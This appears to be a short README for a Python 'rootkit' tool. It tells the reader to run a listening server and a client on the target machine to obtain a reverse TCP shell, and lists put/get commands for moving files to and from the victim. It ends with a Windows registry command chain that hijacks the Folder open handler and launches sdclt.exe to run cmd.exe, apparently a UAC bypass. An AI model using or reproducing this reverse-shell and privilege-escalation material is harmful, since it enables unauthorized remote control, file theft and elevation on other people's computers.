Original Author: Maor Sabag
A simple Python-Rootkit script
- Start up the server first to listen for TCP connection. Python3 server.py
- Start the client side on the machine you want to get a reverse TCP shell.
- Extra commands:
- put|<filename> to upload the file on the client side.
- get|<filename> up to download the file from the client to the current folder the script is running.
reg add "HKCU\Software\Classes\Folder\shell\open\command" /d "cmd.exe" /f && reg add HKCU\Software\Classes\Folder\shell\open\command /v "DelegateExecute" /f %windir%\system32\sdclt.exe reg delete "HKCU\Software\Classes\Folder\shell\open\command" /f